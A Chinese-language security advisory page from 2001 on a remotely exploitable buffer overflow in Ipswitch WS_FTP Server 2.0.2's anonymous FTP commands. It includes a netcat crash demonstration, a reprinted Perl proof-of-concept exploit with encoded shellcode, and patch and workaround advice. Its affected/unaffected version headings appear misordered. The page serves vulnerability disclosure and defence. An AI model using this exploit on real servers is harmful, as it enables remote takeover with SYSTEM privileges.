首页 -> 安全研究
安全研究
安全漏洞
WS-FTP 匿名FTP命令缓冲区溢出漏洞
发布日期:2001-07-25
更新日期:2001-07-31
受影响系统:
不受影响系统:
Ipswitch WS FTP Server 2.0.2
Ipswitch WS FTP Server 2.0.1
Ipswitch WS FTP Server 2.0
- Microsoft Windows NT 4.0
- Microsoft Windows 2000
描述:
Ipswitch WS FTP Server 2.0.3
- Microsoft Windows NT 4.0
- Microsoft Windows 2000
BUGTRAQ ID : 3102
WWS_FTP server 包含一个缓冲区溢出漏洞,它影响下列命令:
* DELE
* MDTM
* MLST
* MKD
* RMD
* RNFR
* RNTO
* SIZE
* STAT
* XMKD
* XRMD
当给这些命令提供一个超过478字节的参数时,将发生缓冲区溢出,EIP将被覆盖。
攻击者可以远程获取SYSTEM权限。
只有在提供了匿名FTP服务时,攻击者才能利用这一漏洞,普通用户不能触发溢出。
<*来源:Defcom Labs Advisory def-2001-28 *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
C:\tools\web>nc -nvv 127.0.0.1 21
(UNKNOWN) [127.0.0.1] 21 (?) open
220-helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
220-Tue Jun 19 14:00:21 2001
220-30 days remaining on evaluation.
220 helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
user ftp
331 Password required
pass ftp
230 user logged in
DELE AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Access violation - code c0000005 (first chance)
eax=000000ea ebx=0067c278 ecx=000000ea edx=00000002 esi=0067c278
edi=77fca3e0
eip=41414141 esp=0104df88 ebp=41414141 iopl=0 nv up ei pl zr
na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00010246
Defcom Labs提供了下列测试代码:
#!/usr/local/bin/perl
#########################################################################
#
# WS_FTP Server 2.0.2 DELE proof-of-concept exploit
# By andreas@defcom.com and janne@defcom.com (C)2001
#
#########################################################################
$login="ftp"; #username
$pass="ftp"; #password
#########################################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
print "WS_FTP server 2.0.2 DELE proof-of-concept exploit\n";
print "It creates a file named defcom.iyd in the c-root\n";
print "(C)2001 andreas\@defcom.com\n";
print "Usage: $0 <host>\n";
print "Example: $0 127.0.0.1\n";
exit;
}
use Socket;
my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "21";
$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";
sleep(1);
$msg = "user $login\n";
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$msg = "pass $pass\n";
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$sploit = "\x8b\xd8\x8b\xf8\x83\xc0\x18\x33\xc9\x66\xb9\x42\x81\x66\x81\xf1\x80\x80\x80\x30\x95\x40\xe2\xfa\xde\x1e\x76";
$sploit = $sploit . "\x1e\x7e\x2e\x95\x6f\x95\x95\xc6\xfd\xd5\x95\x95\x95\x2b\x49\x81\xd0\x95\x6a\x83\x96\x56\x1e\x75\x1e\x7d\xa6\x55";
$sploit = $sploit . "\xc5\xfd\x15\x95\x95\x95\xff\x97\xc5\xc5\xfd\x95\x95\x95\x85\x14\x52\x59\x94\x95\x95\xc2\x2b\xb1\x80\xd0\x95";
$sploit = $sploit . "\x6a\x83\xc5\x2b\x6d\x81\xd0\x95\x6a\x83\xa6\x55\xc5\x2b\x85\x83\xd0\x95\x6a\x83";
$msg = "dele " . $sploit . "\xd4" x (460-length($sploit)) . "\xf6\xaf\xc9\xf1\xf0\xf3\xf6\xfa\xf8\xbb\xfc\xec\xf1\x95";
$msg = $msg . "\xab\xa3\x54\x77" . "\xd4" x 16 . "\x8b\xc4\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x71\xff\xe0\n";
print $msg;
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
exit;
建议:
临时解决方法:
禁止匿名FTP服务。
厂商补丁:
Ipswitch WS FTP Server 2.0.3或者更新版本已经解决了这一问题,我们建议使用此软件
的用户随时关注厂商的主页以获取最新版本:
http://www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html
浏览次数:5637
严重程度:0(网友投票)
绿盟科技给您安全的保障